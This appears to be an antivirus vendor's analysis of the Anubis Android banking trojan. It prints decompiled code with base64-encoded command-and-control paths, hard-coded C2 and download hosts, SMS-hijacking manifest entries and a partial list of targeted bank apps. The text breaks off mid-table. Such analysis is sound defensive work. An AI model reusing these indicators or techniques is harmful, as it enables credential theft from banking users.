{"id":57,"date":"2020-11-18T09:01:18","date_gmt":"2020-11-18T09:01:18","guid":{"rendered":"https:\/\/threats.amnpardaz.com\/en\/?p=57"},"modified":"2021-08-30T12:29:41","modified_gmt":"2021-08-30T12:29:41","slug":"trojan-android-anubis-banker","status":"publish","type":"post","link":"https:\/\/threats.amnpardaz.com\/en\/2020\/11\/18\/trojan-android-anubis-banker\/","title":{"rendered":"Trojan.Android.Anubis.Banker"},"content":{"rendered":"<h2>General Explanation<\/h2>\n<p><strong>Type<\/strong>: Trojan<\/p>\n<p><strong>Degree of destruction<\/strong>: average<\/p>\n<p><strong>Prevalence<\/strong>: average<\/p>\n<h3>What is Trojan?<\/h3>\n<p><span style=\"float: none;background-color: #ffffff;color: #333333;cursor: text;font-family: Georgia,'Times New Roman','Bitstream Charter',Times,serif;font-size: 16px;font-style: normal;font-variant: normal;font-weight: 400;letter-spacing: normal;text-align: left;text-decoration: none;text-indent: 0px\">Trojans are malware that revealed themselves in the format of an applicable and useful tool. Accordingly, the user downloads and installs them and infects the system without notices that it is malware. Trojans, usually after installation, act as a backdoor so the hacker can remotely access the victim&#8217;s system. For instance, the malware we will analyze here seems to do an applicable and useful job, but it will install an unwanted application on the system.<\/span><\/p>\n<h3>What is the Anubis Trojan family?<\/h3>\n<p>There are many applications with the title of <strong>Free 5G<\/strong><strong>\u060c\u00a0<\/strong><strong>20GBHediye<\/strong><strong>\u060c\u00a0<\/strong><strong>20gb_hediye_internet, etc. There is so much like malware with different hash and infected URLs. For instance, the user will download this application as \u201c20gb-hedie-internet\u201d from <\/strong><a href=\"http:\/\/20gb\u0131nternethed\u0131yendowland.com\/20gb_hediye_internet.apk\">http:\/\/xn--20gbnternethedyendowland-tvdk.com\/20gb_hediye_internet.apk<\/a>. After running this application, the malware attempts to receive settings related to accessibility access services and immediately after reaching this goal, will hide the application icon and start its malicious actions in the background. Some of actions that will be done in the user\u2019s phone are:<\/p>\n<ol>\n<li>There are so many dangerous accesses that this malware will receive from the user (attaining user\u2019s local place, internet status, reading contact list, reading income\/outcome messages, voice recording and writing messages, etc.)<\/li>\n<li>Ability to send and receive SMS<\/li>\n<li>Finding a user\u2019s geographical positioning (GPS)<\/li>\n<li>Opening and specific page in the user\u2019s browser, the goal page address, is sent from a malware-infected server to the user\u2019s phone.<\/li>\n<li>Loading another .apk file dynamically and at the time of program running (this job will be done for purposes such as showing advertising on the user\u2019s phone.<\/li>\n<li>Keylogging<\/li>\n<li>Possibility of taking a screenshot of the user\u2019s keyboard<\/li>\n<li>Attempt calling with specific numbers that are sent from the server.<\/li>\n<\/ol>\n<h2>Technical Explanation<\/h2>\n<p>As soon as running the program, activity accessibility will recall receiving the related settings of accessibility access service and until the user does not give any access to the application, will continuously show this message to the user. The appeared message is in Turkish and with this theme that if you wish to activate this application you need to activate accessibility access for the app. As soon as the user enables access to the application, malware with no trouble will enable all its accessibility permissions for itself which are most dangerous and are for next suing. As a result of dynamic file checking, you can view that this malware, will drop some files in the following folders and in the data\/data path:<\/p>\n<ol>\n<li><strong>App_apk:<\/strong> there is a .apk file in this folder that at the moment of execution by using DexClassLoader, API will be loaded by the initial file and some of the malicious actions will be done by this file. Also, for Android version 5 or higher, there is a .oat file and the goal of its loading is to show advertising on the user\u2019s phone.<\/li>\n<li><strong>App_outdex<\/strong>: at the time of execution, the application will check, if the version of the android is API16 and API26 and if there is an .apk file in the path, to show advertising (notification) will load its API by using DexClassLoader. The name of the application package that desire to load it is \u201capps.com.app.utils\u201d. It do this action by separate service in the application.<\/li>\n<li><strong>Shared_prefs<\/strong>: in this section there is a file named: \u201cset.xml\u201d that called as the application configuration file. I.e. malware reads some orders from this file at the time of execution (dynamic) and in exchange for them will run its malicious codes. The reason for malware to use this as local at the time of execution is that maybe this application which acts as a type of android Bot, for any reason cannot connect properly with its servers at the time of execution or receiving necessary instructions from them.<\/li>\n<\/ol>\n<p>After executing this application, according to the configuration file, if you wish to recall the \u201cWebSocket\u201d value:<\/p>\n<p>This malware will communicate with its command and control server or dedelik.com. It uses POST to send encrypted information from user\u2019s phone to a4.php, a14.php, and a3.php and in return receives instructions to perform malicious actions in the user\u2019s phone.<\/p>\n<p>Immediately the <a href=\"https:\/\/www.saglik.gov.tr\/\">https:\/\/www.saglik.gov.tr\/<\/a> website will be open in the user\u2019s browser, i.e. malware has the ability to initiate the user\u2019s browser with the URL that receives from its command and control server.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-58 aligncenter\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2020\/11\/15.png\" alt=\"\" width=\"712\" height=\"304\" \/><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-59 aligncenter\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2020\/11\/15-1.png\" alt=\"\" width=\"715\" height=\"305\" \/><\/p>\n<p>The addresses of all servers which the application will be connected to and due to them will receive the message and execute them in user\u2019s phone are encoded with base64 algorithm.<\/p>\n<p>public String fddo(ContextparamContext, StringparamString1, StringparamString2)<\/p>\n<p><code>{<\/code><\/p>\n<p><code>try<\/code><\/p>\n<p><code>{<\/code><\/p>\n<p><code>if\u00a0 (jdMethod_catch(paramContext))<\/code><\/p>\n<p><code>{<\/code><\/p>\n<p><code>localint=new oawx.minoxvx.ahlpf.fddo.int();<\/code><\/p>\n<p><code>if (paramString1.equals(jdField_int(\"MQ==\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hMy5waHA=\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"Mg==\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hNC5waHA=\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"Mw==\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hNS5waHA=\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"NA==\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hNi5waHA=\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"NQ==\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hNy5waHA=\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"Ng==\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hOC5waHA=\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"Nw==\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hOS5waHA=\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"MTA=\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hMTAucGhw\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"MTE=\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hMTEucGhw\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"MTI=\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hMTIucGhw\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"MTM=\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hMTMucGhw\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"MTQ=\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hMTQucGhw\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"MTU=\")))<\/code><\/p>\n<p><code>str = jdField_int(\"L28xby9hMTUucGhw\");<\/code><\/p>\n<p><code>if\u00a0 (paramString1.equals(jdField_int(\"MjU=\")))<\/code><\/p>\n<p><code>str=jdField_int(\"L28xby9hMjUucGhw\");<\/code><\/p>\n<p><code>}<\/code><\/p>\n<p><code>}<\/code><\/p>\n<p><code>catch(ExceptionparamContext)<\/code><\/p>\n<p><code>{<\/code><\/p>\n<p><code>try<\/code><\/p>\n<p><code>{<\/code><\/p>\n<p><code>oawx.minoxvx.ahlpf.fddo.intlocalint;<\/code><\/p>\n<p><code>Stringstr;<\/code><\/p>\n<p><code>paramString1=fddo(paramContext,jdField_int(\"dXJs\"));<\/code><\/p>\n<p><code>paramContext=paramString1;<\/code><\/p>\n<p><code>if (paramString1 == null)<\/code><\/p>\n<p><code>paramContext=this.fddo.jdField_for;<\/code><\/p>\n<p><code>paramString1=newStringBuilder();<\/code><\/p>\n<p><code>paramString1.append(paramContext);<\/code><\/p>\n<p><code>paramString1.append(str);<\/code><\/p>\n<p><code>return localint.fddo(paramString1.toString(), paramString2);<\/code><\/p>\n<p><code>label372:fddo(jdField_int(\"RVJST1I=\"),jdField_int(\"Q2xhc3MgVXRpbHNDbGFzcywgUE9TVCAtPiBVUkw=\"));<\/code><\/p>\n<p><code>return null;<\/code><\/p>\n<p><code>paramContext=jdField_int(\"PHRhZz48L3RhZz4=\");<\/code><\/p>\n<p><code>return paramContext;<\/code><\/p>\n<p><code>while (true)<\/code><\/p>\n<p><code>{<\/code><\/p>\n<p><code>return jdField_int(\"PHRhZz48L3RhZz4=\");<\/code><\/p>\n<p><code>paramContext=paramContext;<\/code><\/p>\n<p><code>}<\/code><\/p>\n<p><code>}<\/code><\/p>\n<p><code>catch(ExceptionparamContext)<\/code><\/p>\n<p><code>{<\/code><\/p>\n<p><code>break label372;<\/code><\/p>\n<p><code>}<\/code><\/p>\n<p><code>}<\/code><\/p>\n<p><code>}<\/code><\/p>\n<p>The name of the servers are as follows and that in each level according to the type of action information will send\/receive to\/from which server, is up to \u201cjdField_int\u201d that recalled from \u201cifdf\u201d<\/p>\n<ul>\n<li><strong>jdField_int = 1<\/strong>\u00a0::\/o1o\/a3.php<\/li>\n<li><strong>jdField_int = 2<\/strong>\u00a0::\/o1o\/a4.php<\/li>\n<li><strong>jdField_int = 3<\/strong>\u00a0::\/o1o\/a6.php<\/li>\n<li><strong>jdField_int = 4<\/strong>\u00a0::\/o1o\/a6.php<\/li>\n<li><strong>jdField_int = 5<\/strong>\u00a0::\/o1o\/a7.php<\/li>\n<li><strong>jdField_int = 6<\/strong>\u00a0::\/o1o\/a8.php<\/li>\n<li><strong>jdField_int = 7<\/strong>\u00a0::\/o1o\/a9.php<\/li>\n<li><strong>jdField_int = 10<\/strong>\u00a0::\/o1o\/a10.php<\/li>\n<li><strong>jdField_int = 11<\/strong>\u00a0::\/o1o\/a11.php<\/li>\n<li><strong>jdField_int = 12<\/strong>\u00a0::\/o1o\/a12.php<\/li>\n<li><strong>jdField_int = 13<\/strong>\u00a0::\/o1o\/a13.php<\/li>\n<li><strong>jdField_int = 14<\/strong>\u00a0::\/o1o\/a14.php<\/li>\n<li><strong>jdField_int = 15<\/strong>\u00a0::\/o1o\/a15.php<\/li>\n<li><strong>jdField_int = 25<\/strong>\u00a0::\/o1o\/a25.php<\/li>\n<\/ul>\n<p>In addition to malware configuration file named set.xml, which is in the path of data\/data\/shared_prefs and it will be used during the malware execution, there are set of supra instruction in the application code, which are hard encoded. There are some existence dangerous orders in the configuration file and application code that can spying and extracting important personal information from the infected device:<\/p>\n<ul>\n<li>keylogger: stealing pressed key information from the user\u2019s keyboard.<\/li>\n<li>GPS specifies the user\u2019s location.<\/li>\n<li>spam SMS: sending spam SMS<\/li>\n<li>VNC_Start_New<\/li>\n<li>startRecordingSound: recording sound<\/li>\n<li>htmllocker: shows the ransom-related page after encrypting the files (the code of this section is not activated in this type of malware).<\/li>\n<li><span style=\"float: none;background-color: #ffffff;color: #333333;font-family: inherit;font-size: 100%;font-style: inherit;font-variant: normal;font-weight: inherit;letter-spacing: normal;text-align: justify;text-decoration: none;text-indent: 0px\">urlInj<\/span>r: it\u2019s for initiating a web page in the user\u2019s browser.<\/li>\n<li>textPlayProtect: it is one of the orders and its value is equal to the string: \u201cthe system is not working properly, please disable Google Play Protect\u201d.<\/li>\n<\/ul>\n<p>Malware builder when attempts to activate Play Protect, will show warnings to the user. Because one of the malware actions is disabling this service to stay un-recognized on the user\u2019s phone. So, first, check the language of the user\u2019s phone and this message can appear in multiple languages. The languages of this messages are as follows:<\/p>\n<p><code>[(Russia (RU), United States (US),Turkish (TR),German (DE),Italy (IT),France (FR),Ukraine (UA ]<\/code><\/p>\n<p><code>public void setSharedPreferences(Contextcontext){<\/code><\/p>\n<p><code>if (VERSION.SDK_INT &gt;= 19) {<\/code><\/p>\n<p><code>this.setSharedPreference(context, \"swspacket\",<\/code><\/p>\n<p><code>Sms.getDefaultSmsPackage(context).toString());<\/code><\/p>\n<p><code>}\u00a0else\u00a0 {<\/code><\/p>\n<p><code>this.setSharedPreference(context, \"swspacket\", \"\");<\/code><\/p>\n<p><code>}<\/code><\/p>\n<p><code>this.setSharedPreference(context, \"VNC_Start_NEW\",<\/code><\/p>\n<p><code>\"http:\/\/ktosdelaetskrintotpidor.com\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"Starter\",<\/code><\/p>\n<p><code>\"http:\/\/sositehuypidarasi.com\");<\/code><\/p>\n<p><code>this.setSharedPreference (context, \"time_work\", \"0\");<\/code><\/p>\n<p><code>this.setSharedPreference (context, \"time_start_permission\", \"0\");<\/code><\/p>\n<p><code>StringBuildervar2 = newStringBuilder() ;<\/code><\/p>\n<p><code>var2.append(\"\") ;<\/code><\/p>\n<p><code>this.constants.getClass() ;<\/code><\/p>\n<p><code>var2.append(\"http:\/\/update-apk.net\".replace(\" \",\"\"));<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"urls\",var2.toString());<\/code><\/p>\n<p><code>var2=newStringBuilder();<\/code><\/p>\n<p><code>var2.append(\"\");<\/code><\/p>\n<p><code>this.constants.getClass();<\/code><\/p>\n<p><code>var2.append(\"\".replace(\" \",\"\"));<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"urlInj\",var2.toString());<\/code><\/p>\n<p><code>var2=newStringBuilder();<\/code><\/p>\n<p><code>var2.append(\"\");<\/code><\/p>\n<p><code>this.constants.getClass();<\/code><\/p>\n<p><code>var2.append(10000);<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"interval\",var2.toString());<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"name\",\"false\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"perehvat_sws\",\"false\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"del_sws\",\"false\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"network\",\"false\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"gps\",\"false\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"madeSettings\",\"1 2 3 4 5 6 7 8 9 10 11 12 13 \");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"RequestINJ\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"RequestGPS\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"save_inj\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"SettingsAll\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"getNumber\",\"false\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"dateCJ\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"iconCJ\",\"0:0\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"str_push_fish\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"timeStartGrabber\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"checkStartGrabber\",\"0\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"startRequest\",\"Access=0Perm=0\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"StringPermis\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"StringActivate\",\"activate\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"StringAccessibility\",\"Enable access for\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"StringYes\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"uninstall1\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"uninstall2\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"vkladmin\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"websocket\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"vnc\",\"start\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"sound\",\"start\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"straccessibility\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"straccessibility2\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"findfiles\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"foregroundwhile\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"cryptfile\",\"false\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"status\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"key\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"htmllocker\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"lock_amount\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"lock_btc\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"keylogger\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"recordsoundseconds\",\"0\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"startRecordSound\",\"stop\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"play_protect\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"textPlayProtect\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"buttonPlayProtect\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"spamSMS\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"textSPAM\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"indexSMSSPAM\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"DexSocksMolude\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"lookscreen\",\"\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"step\",\"0\");<\/code><\/p>\n<p><code>this.setSharedPreference(context,\"id_windows_bot\",\"\");<\/code><\/p>\n<p><code>...<\/code><\/p>\n<p>Some of the other actions of this malware:<\/p>\n<ul>\n<li>attaining user\u2019s phone files<\/li>\n<\/ul>\n<p>In fact, attain the list of all folders and files inside them and send them to its server (probably, it is doing it because of ransoming which is disabled in this case).<\/p>\n<ul>\n<li>Possibility of send\/receive SMS<\/li>\n<\/ul>\n<p>For your application can appear as a default SMS application in your system settings, there must be some defined special capabilities in your manifest file such as:<\/p>\n<ul>\n<li>minoxvx.ahlpf.Receiver.ReceiverMms: in a component receiver, an intent-filter named SMS_DELIVER_ACTION must be used which let the application to directly receive the received SMS in the user\u2019s phone. All received messages of the user\u2019s phone are readable with the number and the text.<\/li>\n<li>minoxvx.ahlpf.Receiver.RecieverPushService: in a component receiver an intent-filter named WAP_PUSH_DELIVER_ACTION must be used and also type should be specified for (\u201capplication\/vnd.wap.mms-message MIME) which let the application to receive the income MMS messages directly.<\/li>\n<li>The oawx.minoxvx.ahlpf.SendSms activity due to an intent-filter named BROWSABLE will offer this application as a message delivery application, when user is opening applications such as SMS, SMSTO, MMS, and MMSTO. So, here, this application is used for sending messages.<\/li>\n<li>minoxvx.ahlpf.ServiceHeadlessSmsSend service due to using an intent-filter named ACTION_RESPONSE_VIA_MESSAGE (\u201candroid.intent.action.RESPOND_VIA_MESSAGE\u201d) by using algorithms such as: sms, smsto, mms and mmsto) will allow users to respond to your income SMS and calls.<\/li>\n<\/ul>\n<p><code>&lt;receiverandroid:name=\"oawx.minoxvx.ahlpf.Receiver.ReceiverMms\"android:permission=\"android.permission.BROADCAST_SMS\"&gt;<\/code><\/p>\n<p><code>&lt;intent-filter&gt;<\/code><\/p>\n<p><code>&lt;actionandroid:name=\"android.provider.Telephony.SMS_DELIVER\"\/&gt;<\/code><\/p>\n<p><code>&lt;\/intent-filter&gt;<\/code><\/p>\n<p><code>&lt;\/receiver&gt;<\/code><\/p>\n<p><code>&lt;receiverandroid:enabled=\"true\"android:name=\"oawx.minoxvx.ahlpf.Receiver.RecieverPushService\"android:permission=\"android.permission.BROADCAST_WAP_PUSH\"&gt;<\/code><\/p>\n<p><code>&lt;intent-filter&gt;<\/code><\/p>\n<p><code>&lt;actionandroid:name=\"android.provider.Telephony.WAP_PUSH_DELIVER\"\/&gt;<\/code><\/p>\n<p><code>&lt;dataandroid:mimeType=\"application\/vnd.wap.mms-message\"\/&gt;<\/code><\/p>\n<p><code>&lt;\/intent-filter&gt;<\/code><\/p>\n<p><code>&lt;\/receiver&gt;<\/code><\/p>\n<p><code>&lt;activityandroid:name=\"oawx.minoxvx.ahlpf.SendSms\"&gt;<\/code><\/p>\n<p><code>&lt;intent-filter&gt;<\/code><\/p>\n<p><code>&lt;actionandroid:name=\"android.intent.action.SEND\"\/&gt;<\/code><\/p>\n<p><code>&lt;actionandroid:name=\"android.intent.action.SENDTO\"\/&gt;<\/code><\/p>\n<p><code>&lt;dataandroid:scheme=\"sms\"\/&gt;<\/code><\/p>\n<p><code>&lt;dataandroid:scheme=\"smsto\"\/&gt;<\/code><\/p>\n<p><code>&lt;dataandroid:scheme=\"mms\"\/&gt;<\/code><\/p>\n<p><code>&lt;dataandroid:scheme=\"mmsto\"\/&gt;<\/code><\/p>\n<p><code>&lt;categoryandroid:name=\"android.intent.category.DEFAULT\"\/&gt;<\/code><\/p>\n<p><code>&lt;categoryandroid:name=\"android.intent.category.BROWSABLE\"\/&gt;<\/code><\/p>\n<p><code>&lt;\/intent-filter&gt;<\/code><\/p>\n<p><code>&lt;\/activity&gt;<\/code><\/p>\n<p><code>&lt;serviceandroid:exported=\"true\"android:name=\"oawx.minoxvx.ahlpf.ServiceHeadlessSmsSend\"android:permission=\"android.permission.SEND_RESPOND_VIA_MESSAGE\"&gt;<\/code><\/p>\n<p><code>&lt;intent-filter&gt;<\/code><\/p>\n<p><code>&lt;actionandroid:name=\"android.intent.action.RESPOND_VIA_MESSAGE\"\/&gt;<\/code><\/p>\n<p><code>&lt;categoryandroid:name=\"android.intent.category.DEFAULT\"\/&gt;<\/code><\/p>\n<p><code>&lt;dataandroid:scheme=\"sms\"\/&gt;<\/code><\/p>\n<p><code>&lt;dataandroid:scheme=\"smsto\"\/&gt;<\/code><\/p>\n<p><code>&lt;dataandroid:scheme=\"mms\"\/&gt;<\/code><\/p>\n<p><code>&lt;dataandroid:scheme=\"mmsto\"\/&gt;<\/code><\/p>\n<p><code>&lt;\/intent-filter&gt;<\/code><\/p>\n<p><code>&lt;\/service&gt;<\/code><\/p>\n<p><strong>Following location<\/strong><\/p>\n<p>Attaining latitude and longitude to find GPS coordinates, user\u2019s location, or the place user attends in include address, latitude and longitude could be attainable.<\/p>\n<p><strong>Scam in e-banking <\/strong><\/p>\n<p>One of the malicious actions of this malware is a scam in e-banking. So, it checks a huge list of e-banking applications in its application which all of which are bilayer and encrypted with base 64 coding algorithm.<\/p>\n<p>By using (getInstalledApplications), API checks 128 its applications with the list of installed applications in the user\u2019s phone. This malware navigates more than 100 applications and capable to show scams for stealing verified documentations. Most applications are banking applications and in general, fall into the following categories:<\/p>\n<ul>\n<li>Shopping<\/li>\n<li>Banking<\/li>\n<li>Stock trading<\/li>\n<\/ul>\n<p>The goal of the malware builder is to check to execute processes in the background and detect if the process relates to each one of the goal-oriented executing applications. After initiating one of the goal-oriented applications by overlay attacks and android accessibility services, the scam form of log-in to the system will be appeared to phishing user\u2019s secret information in its own window and it wants the user to enter the account name, password, and other critical data. The related page will be sent by the command and control server and malware can receive all applications which are currently running on the phone. This matter will be done due to PACKAGE_USAGE_STATS permission, which the user gave to it.<\/p>\n<p>BankBot Anubis uses the android accessibility services to do keylogging as a way to attain user\u2019s credit card information when accessing a mobile goal-oriented banking application. In most android banking Trojans, the malware uses a fake overlay screen to access to user\u2019s data by accessing the user to a Goal application.<\/p>\n<p><strong>Accessibility services<\/strong><\/p>\n<p>This service is running in the background and receives the callbacks which will send from android OS, by accessibilityEvents. Actually, these events are transactions between a user and the system; such as when screen focus is changed, a button is clicked and etc.<\/p>\n<p>To attain these kinds of services, there must be possible to request the ability to query from active window content. For this matter, it can navigate user\u2019s activities and have the ability to search in cases such as message boxes. Each accessibility event has the source component that defines which application is the reason for current events. For instance, different types that had been used in the malware are as follows:<\/p>\n<ul>\n<li>TYPE_VIEW_CLICKED<\/li>\n<li>TYPE_VIEW_FOCUSED<\/li>\n<li>TYPE_VIEW_TEXT_CHANGED<\/li>\n<li>TYPE_WINDOW_STATE_CHANGED\n<ul>\n<li>Screen capture<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Also, this malware is able to capture images of the user\u2019s keyboard, when he\/she is entering credit card information or personal profile in the mentioned application.<\/p>\n<p><strong>List of applications:<\/strong><\/p>\n<table width=\"100%\">\n<tbody>\n<tr>\n<td width=\"40%\"><strong>Name of the application<\/strong><\/td>\n<td width=\"60%\"><strong>package name<\/strong><\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">VK \u2014 live chatting &amp; free calls<\/td>\n<td width=\"60%\">com.vkontakte.android<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Bankia<\/td>\n<td width=\"60%\">es.cm.android<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Ba3nkia Wallet<\/td>\n<td width=\"60%\">com.bankia.wallet<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Best Buy<\/td>\n<td width=\"60%\">com.bestbuy.android<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">SantanderSign<\/td>\n<td width=\"60%\">mobile.santander.de<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">ebay<\/td>\n<td width=\"60%\">com.ebay.mobile<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Kuveyt T\u00fcrk<\/td>\n<td width=\"60%\">com.kuveytturk.mobil<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Odeabank<\/td>\n<td width=\"60%\">com.magiclick.odeabank<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Papara<\/td>\n<td width=\"60%\">com.mobillium.papara<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">CEPTETEB<\/td>\n<td width=\"60%\">com.teb<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Vak\u0131fBank Mobil Bankac\u0131l\u0131k<\/td>\n<td width=\"60%\">com.vakifbank.mobile<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">\u015eEKER MOB\u0130L \u015eUBE<\/td>\n<td width=\"60%\">tr.com.sekerbilisim.mbank<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Akbank<\/td>\n<td width=\"60%\">com.akbank.android.apps.akbank_direkt<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Akbank<\/td>\n<td width=\"60%\">com.akbank.android.apps.akbank_direkt_tablet<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Akbank Direkt \u015eifreci<\/td>\n<td width=\"60%\">com.akbank.softotp<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Akbank<\/td>\n<td width=\"60%\">com.akbank.android.apps.akbank_direkt_tablet_20<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Akbank Sanat<\/td>\n<td width=\"60%\">com.fragment.akbank<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Yap\u0131 Kredi Mobile<\/td>\n<td width=\"60%\">com.ykb.android<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Yap\u0131 Kredi Corporate-For Firms<\/td>\n<td width=\"60%\">com.ykb.android.mobilonay<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Yap\u0131 Kredi C\u00fczdan<\/td>\n<td width=\"60%\">com.ykb.avm<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Yap\u0131 Kredi Mobil \u015eube<\/td>\n<td width=\"60%\">com.ykb.androidtablet<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Yap\u0131Kredi Az\u0259rbaycan MobilBank<\/td>\n<td width=\"60%\">com.veripark.ykbaz<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">\u00c7EKSOR<\/td>\n<td width=\"60%\">com.softtech.iscek<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">JSC \u0130\u015eBANK<\/td>\n<td width=\"60%\">com.yurtdisi.iscep<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">\u0130\u015fTablet<\/td>\n<td width=\"60%\">com.softtech.isbankasi<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">ISBANK Online<\/td>\n<td width=\"60%\">com.monitise.isbankmoscow<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">QNB Finansbank Cep \u015eubesi<\/td>\n<td width=\"60%\">com.finansbank.mobile.cepsube<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Enpara.com Cep \u015eubesi<\/td>\n<td width=\"60%\">finansbank.enpara<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">FinansPOS<\/td>\n<td width=\"60%\">com.magiclick.FinansPOS<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">QNB Finansinvest<\/td>\n<td width=\"60%\">com.matriksdata.finansyatirim<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">Enpara.com \u015eirketim Cep \u015eubesi<\/td>\n<td width=\"60%\">finansbank.enpara.sirketim<\/td>\n<\/tr>\n<tr>\n<td width=\"40%\">QNB 